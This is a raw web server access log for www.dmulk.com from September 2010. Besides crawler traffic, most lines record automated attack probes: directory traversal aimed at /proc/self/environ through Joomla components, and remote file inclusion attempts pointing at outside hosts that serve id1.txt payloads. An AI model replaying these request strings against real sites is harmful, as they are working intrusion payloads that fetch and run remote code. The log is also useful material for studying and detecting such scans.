89.200.170.145 - - [02/Sep/2010:10:31:54 -0700] "GET /logs/access_100616.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:31:55 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:31:56 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
123.125.68.124 - - [02/Sep/2010:10:32:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.1" 200 727834 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:32:09 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:32:09 -0700] "GET /logs/access_100822.log/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:32:09 -0700] "GET /*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
202.45.154.38 - - [02/Sep/2010:10:32:09 -0700] "GET /logs/*?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:32:10 -0700] "GET /logs/access_080610.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:32:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
89.200.170.145 - - [02/Sep/2010:10:32:14 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:32:22 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 167695 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:32:24 -0700] "GET /logs/access_080130.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:32:24 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 68550 "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:32:34 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:10:32:35 -0700] "GET /logs/access_080428.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:10:32:35 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:10:32:35 -0700] "GET /logs/access_081013.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:10:32:38 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:32:39 -0700] "GET /logs/access_090714.log HTTP/1.0" 200 3467153 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:33:19 -0700] "GET /logs/access_090905.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:33:19 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:33:19 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:33:26 -0700] "GET /logs/access_100509.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:33:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:33:29 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:33:35 -0700] "GET /logs/access_100614.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:33:36 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68485 "-" "libwww-perl/5.813" "www.dmulk.com"
80.245.41.107 - - [02/Sep/2010:10:33:37 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.dmulk.com"
59.106.19.69 - - [02/Sep/2010:10:33:46 -0700] "GET /logs/access_081013.log%20%20/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://halusinasi.zoomshare.com/files/code/fx29id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:33:47 -0700] "GET /logs/access_071225.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:33:50 -0700] "GET /logs/access_100509.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:33:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:33:53 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:33:56 -0700] "GET /logs/access_100131.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
66.249.67.244 - - [02/Sep/2010:10:33:58 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.68.204 - - [02/Sep/2010:10:33:59 -0700] "GET /blog/wp-content/gallery/2009-westoc/westoc2009-0141.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.67.209 - - [02/Sep/2010:10:33:59 -0700] "GET /blog/wp-content/gallery/2009-westoc/westoc2009-0137.jpg HTTP/1.1" 200 0 "-" "Googlebot-Image/1.0" "dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:34:34 -0700] "GET /bikes/dteel/CreSTOC08/?M=A HTTP/1.0" 200 6009 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.61.244.6 - - [02/Sep/2010:10:34:36 -0700] "GET ////?option=com_google&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68602 "-" "libwww-perl/5.76" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:34:42 -0700] "GET /logs/access_090118.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:34:53 -0700] "POST /logs/access_090602.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:34:53 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
77.221.145.35 - - [02/Sep/2010:10:34:53 -0700] "POST /contact.php HTTP/1.0" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:34:58 -0700] "GET /logs/access_090914.log/////appserv/main.php?appserv_root=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:35:05 -0700] "GET /logs/access_081127.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:35:05 -0700] "GET /logs/access_090305.log/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:36:25 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:36:25 -0700] "GET /logs/access_090905.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:36:26 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:10:37:00 -0700] "POST /logs/access_081019.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:10:37:00 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
79.171.34.31 - - [02/Sep/2010:10:37:03 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:37:04 -0700] "GET /logs/access_100131.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
207.46.194.100 - - [02/Sep/2010:10:37:21 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
207.46.194.100 - - [02/Sep/2010:10:37:21 -0700] "GET /blog/wp-content/gallery/2009-westoc/westoc2009-0531.jpg HTTP/1.1" 200 82313 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:37:22 -0700] "GET /logs/access_080207.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:37:35 -0700] "GET /logs/access_100213.log/////appserv/main.php?appserv_root=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:15 -0700] "GET /logs/access_100824.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
202.150.221.114 - - [02/Sep/2010:10:38:17 -0700] "GET /logs/access_090102.log//admin.php?act=http://www.be-boost.fr//components/com_artforms/assets/captcha/includes/captchaform/give/id1??? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.dmulk.com"
202.150.221.114 - - [02/Sep/2010:10:38:17 -0700] "GET /logs/access_071225.log//admin.php?act=http://www.be-boost.fr//components/com_artforms/assets/captcha/includes/captchaform/give/id1??? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:38:22 -0700] "GET /logs/access_080525.log HTTP/1.0" 200 2803358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:22 -0700] "GET /logs/access_100511.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:24 -0700] "GET /logs/access_100824.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68479 "-" "libwww-perl/5.805" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:27 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:38:28 -0700] "GET /logs/access_090905.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
216.199.249.10 - - [02/Sep/2010:10:38:35 -0700] "GET /logs/access_100511.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:38:48 -0700] "GET /bikes/wrr/?M=A HTTP/1.0" 200 1232 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:39:03 -0700] "GET /logs/access_081006.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:39:08 -0700] "GET /logs/access_100131.log%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:39:32 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:39:35 -0700] "POST /logs/access_081025.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:39:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
83.103.72.131 - - [02/Sep/2010:10:39:44 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:40:19 -0700] "GET /bikes/dteel/WeSTOC07/?S=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:40:38 -0700] "GET /logs/access_090905.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:40:47 -0700] "GET /logs/access_100131.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
217.212.224.181 - - [02/Sep/2010:10:40:52 -0700] "GET /minamijewelry/html/schedule.html HTTP/1.0" 200 12758 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
74.50.85.15 - - [02/Sep/2010:10:41:08 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:10:41:23 -0700] "GET /logs///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:10:41:23 -0700] "GET /logs/access_081126.log%20%20///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:10:41:23 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:10:41:23 -0700] "GET /logs/access_080820.log%20%20///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:42:15 -0700] "GET /bad_link.php?theme_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:42:15 -0700] "GET /logs/access_091025.log%20%20/bad_link.php?theme_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:42:15 -0700] "GET /logs/bad_link.php?theme_path=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.118.93.84 - - [02/Sep/2010:10:42:17 -0700] "POST /logs/access_100317.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:42:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:42:25 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:42:25 -0700] "POST /logs/access_081230.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
65.13.185.104 - - [02/Sep/2010:10:42:42 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
65.13.185.104 - - [02/Sep/2010:10:42:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
222.236.47.182 - - [02/Sep/2010:10:42:42 -0700] "GET /logs/access_080103.log%20%20/?_SERVER[DOCUMENT_ROOT]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.13.185.104 - - [02/Sep/2010:10:42:51 -0700] "POST /logs/access_091104.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:10:44:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:10:44:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:10:44:14 -0700] "POST /logs/access_100707.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
69.175.99.10 - - [02/Sep/2010:10:44:45 -0700] "POST /logs/access_100705.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.dmulk.com"
65.13.185.104 - - [02/Sep/2010:10:44:47 -0700] "POST /logs/access_081230.log%20%20//contact.php HTTP/1.1" 404 - "-" "MaMa CyBer" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:45:02 -0700] "GET /logs/access_090513.log HTTP/1.0" 200 5094004 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:10:45:03 -0700] "GET /logs/access_080820.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
205.251.131.112 - - [02/Sep/2010:10:45:11 -0700] "GET /logs/access_080207.log///components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://lisia.pl/libraries/pear/archive_tar/ide1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.114.243 - - [02/Sep/2010:10:45:32 -0700] "GET /bikes/dteel/2008_09_13/?D=A HTTP/1.0" 200 1678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:46:20 -0700] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:46:21 -0700] "GET /logs/access_090905.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:46:21 -0700] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:21 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:21 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:22 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
204.188.241.2 - - [02/Sep/2010:10:46:23 -0700] "POST /logs/access_081025.log%20%20/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:24 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:25 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:25 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
68.71.60.164 - - [02/Sep/2010:10:46:28 -0700] "POST /logs/access_081230.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.dmulk.com"
174.133.9.196 - - [02/Sep/2010:10:46:29 -0700] "GET /logs/access_100131.log/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://yeshouse.mk.co.kr/my/visual/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
91.201.66.60 - - [02/Sep/2010:10:47:04 -0700] "GET /logs/access_081122.log HTTP/1.1" 200 4258638 "http://www.dmulk.com/logs/access_081122.log" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:48:08 -0700] "GET /logs/access_100206.log%20%20//?_PHPLIB[libdir]=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:48:10 -0700] "GET /logs//?_PHPLIB[libdir]=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 200 167700 "-" "Mozilla/5.0" "www.dmulk.com"
87.238.162.144 - - [02/Sep/2010:10:48:14 -0700] "GET /?_PHPLIB[libdir]=http://soturi.tuta.org/media/1/shop/2/id1.txt?? HTTP/1.1" 200 68556 "-" "Mozilla/5.0" "www.dmulk.com"
